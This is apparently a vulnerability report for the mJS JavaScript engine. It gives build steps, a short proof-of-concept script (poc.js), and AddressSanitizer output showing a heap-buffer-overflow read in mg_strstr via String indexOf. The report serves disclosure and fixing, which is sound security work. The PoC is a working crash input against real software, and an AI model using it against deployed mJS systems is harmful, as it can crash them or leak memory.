Heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53)

[hope-fly]

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile
DOCKER_GCC=gcc
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make

Test case

poc.js

function JSEtest(a) {
  let arr = ['prototype'.indexOf(JSON.stringify({ foo: [], bar: {} }, ['foo', 'bar', 'myProp']))];

  if (a < 10)
    JSEtest(a + 1);
}
JSEtest(0);

​

Execution steps & Output

$ ./mjs/build/mjs poc.js

ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b0000000ab at pc 0x7fabea0b7f54 bp 0x7ffdfc32c250 sp 0x7ffdfc32b9f8
READ of size 19 at 0x60b0000000ab thread T0
    #0 0x7fabea0b7f53  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53)
    #1 0x55e0e1aa2ff6 in mg_strstr src/common/mg_str.c:154
    #2 0x55e0e1a6c363 in mjs_string_index_of src/mjs_string.c:366
    #3 0x55e0e19c5244 in mjs_execute src/mjs_exec.c:853
    #4 0x55e0e19cea05 in mjs_exec_internal src/mjs_exec.c:1073
    #5 0x55e0e19cea05 in mjs_exec_file src/mjs_exec.c:1096
    #6 0x55e0e198b909 in main src/mjs_main.c:47
    #7 0x7fabe9a34b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #8 0x55e0e198c449 in _start (/usr/local/bin/Gmjs+0xe449)

0x60b0000000ab is located 0 bytes to the right of 107-byte region [0x60b000000040,0x60b0000000ab)
allocated by thread T0 here:
    #0 0x7fabea0e6f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x55e0e1a9d346 in mbuf_resize src/common/mbuf.c:50

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xaff53)
Shadow bytes around the buggy address:
  0x0c167fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c167fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c167fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c167fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c167fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x0c167fff8010: 00 00 00 00 00[03]fa fa fa fa fa fa fa fa fd fd
  0x0c167fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c167fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c167fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c167fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c167fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

Credits: Found by OWL337 team.